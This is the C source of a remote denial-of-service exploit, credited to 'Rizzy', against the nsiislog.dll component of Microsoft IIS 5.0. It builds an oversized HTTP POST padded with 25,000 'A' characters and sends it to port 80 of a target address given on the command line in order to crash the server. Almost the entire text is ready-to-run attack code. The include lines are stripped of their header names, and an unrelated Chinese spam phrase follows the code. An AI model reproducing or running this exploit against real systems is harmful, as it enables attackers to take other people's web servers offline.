/* Remote IIS 5.0 DoS exploit - coded by Rizzy - butayne@linuxmail.org Exploits the stack based overflow in nsiislog.dll Advisory: http://packetstormsecurity.nl/0306-advisories/wmediaremote.txt */ #include #include #include #include int main(int argc, char *argv[]) { char buffer[25070]="POST /scripts/nsiislog.dll HTTP/1.1\r\nContent-length:25000\r\n\r\n"; struct sockaddr_in sin; int a, sock, con; printf("\n\nRizzy's IIS 5.0 (nsiislog.dll) Remote DoS exploit\n"); if(argc!=2) { printf("Syntax: %s \n\n", argv[0]); return 0; } sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = inet_addr(argv[1]); sock = socket(AF_INET, SOCK_STREAM, 0); con = connect(sock, (struct sockaddr *)&sin, sizeof(sin)); if (sock && con < 0) { printf("Socket error!\n"); return 1; } for(a = 0; a < 25000 ;++a) { strcat(buffer, "A"); } strcat(buffer, "\r\n\r\n"); printf("Sending buffer to crash IIS server [%s]\n", argv[1]); send(sock, buffer, sizeof(buffer), 0); close(sock); printf("Done!\n"); }

亚洲欧美在线